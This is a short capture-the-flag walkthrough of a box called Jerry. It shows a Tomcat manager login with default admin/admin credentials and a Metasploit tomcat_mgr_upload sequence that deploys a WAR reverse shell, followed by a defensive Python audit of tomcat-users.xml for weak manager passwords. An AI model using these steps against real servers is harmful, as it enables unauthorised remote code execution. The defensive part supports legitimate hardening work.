🐱Jerry

Start with an nmap scan:

We find a Tomcat page:

We see the manager page button, which asks us for credentials. We try admin/admin and end up on this page:

We see some credentials here that seem to be an example, but who knows.

I open a private browsing window and try to connect with those creds, and it works.

While looking around, we see this:

While looking for a .war reverse shell:

msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit

And we got a shell:
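The root cause above is a manager account with a guessable password, so here is a defender-side check, added as an example and not part of the original write-up: it audits a `tomcat-users.xml` for accounts that hold a deploy-capable manager role and a weak password. The sample file, the weak-password list and the 12-character threshold are assumptions made for the illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample config. admin/admin is the pair from the write-up;
# tomcat/s3cret is the sample pair in Tomcat's own manager help text
# (assumed here; the write-up does not name the example pair it found).
SAMPLE_TOMCAT_USERS = """<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="admin" password="admin" roles="manager-gui,admin-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deploy" password="x9!Lq7#vT2pWm4zR" roles="manager-script"/>
  <user username="viewer" password="viewer" roles="reports"/>
</tomcat-users>
"""

# Assumed, deliberately short deny-list; extend it with your own policy.
KNOWN_WEAK = {"admin", "tomcat", "s3cret", "password", "manager"}
# Roles that can deploy WAR files: manager-gui (HTML upload form) and
# manager-script (text interface).
DEPLOY_ROLES = {"manager-gui", "manager-script"}


def audit_tomcat_users(xml_text):
    """Return [(username, deploy_roles, reason)] for risky manager accounts."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        # A real file usually declares an XML namespace: compare local names.
        if el.tag.rsplit("}", 1)[-1] != "user":
            continue
        name, pw = el.get("username", ""), el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        deploy = sorted(roles & DEPLOY_ROLES)
        if not deploy:
            continue  # account cannot deploy applications
        if pw == name:
            reason = "password equals username"
        elif pw.lower() in KNOWN_WEAK:
            reason = "password on weak/default list"
        elif len(pw) < 12:  # assumed minimum length for plaintext entries
            reason = "password shorter than 12 characters"
        else:
            continue
        findings.append((name, deploy, reason))
    return findings


if __name__ == "__main__":
    for name, roles, reason in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"[!] {name}: {reason}; can deploy via {', '.join(roles)}")
```

Run it against the file under `conf/` on each Tomcat host; any hit is an account that can upload a WAR through the manager application.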
